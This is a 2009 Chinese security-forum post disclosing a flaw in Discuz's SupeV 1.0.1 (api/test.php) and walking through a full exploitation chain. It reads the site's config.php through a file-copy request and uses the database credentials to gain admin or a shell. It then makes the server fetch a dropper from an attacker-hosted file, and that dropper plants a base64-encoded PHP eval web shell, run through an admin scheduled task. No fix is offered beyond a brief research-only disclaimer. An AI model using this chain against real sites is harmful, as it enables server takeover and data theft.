服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4581|回复: 0

Discuz旗下视频播客产品SupeV爆出安全漏洞

[复制链接]
dirtysea 发表于 2009-8-15 00:36:56 | 显示全部楼层 |阅读模式
Discuz旗下视频播客产品SupeV爆出安全漏洞,配置不当可导致服务器权限丢失。

影响版本:SupeV 1.0.1

漏洞描述:
Discuz旗下视频播客产品SupeV

漏洞文件:api目录下test.php
直接看代码
$str=file_get_contents( $thumb );//首先第18行用file_get_contents() 读取$thumb参数的文件内容,注意这里也可以读远程文件,
$path = ".".getthumb_path( $vid );//第19行获取路径参数 $vid
$opt_big = array(

"targetfile" => $path.".jpg",

"attach" => $attach['attach'],

"ext" => $attach['extension'],

"ratio" => false,

"width" => THUMB_BIG_WIDTH,

"height" => THUMB_BIG_HEIGHT

);  //24行到39行定义$opt_big和$opt_small数组

@sf_copy( $opt_big['targetfile'], $opt_small['targetfile'] );//紧接着第40行就开始copy了,注意看,把$opt_big数组里的targetfile复制到$opt_small数组的targetfile



安全建议:暂无


测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

漏洞形成,直接以get方式请求 api/test.php?thumb=../config.php&vid=../../1 会把config.php复制到根目录下1.jpg 这样就得到了网站的配置文件,phpmyadmin连上去,如果是root连接,直接导出shell,不会的查查对应文章,这里不再叙述。

如果不是root,就注册个账号,连上去把用户的admgid改成1 在sv_members表里接下来讲后台获取shell,前面test.php代码file_get_contents() 可以读取远程文件写入到网站目录 api/test.php?thumb=http://你的空间地址/test.txt&vid=../../../../inc/crons/1写到inc/crons/1.jpg

test.txt内容 <?php fputs(fopen("111.php","w"),base64_decode("PD9ldmFsKCRfUE9TVFtjbWRdKTs/Pg=="));?> 作用是在当前目录生成111.php 内容是LANKER的一句话,密码cmd 为什么写这里,等下就知道了,进入后台,点上方的辅助工具,新增计划任务提交就执行了inc/crons/1.jpg内容会在根目录下生成111.php内容是LANKER的一句话,密码cmd 成功拿到shell,完了记得删除那个计划任务,不然网站就打不开了。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-29 03:23 , Processed in 0.092447 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表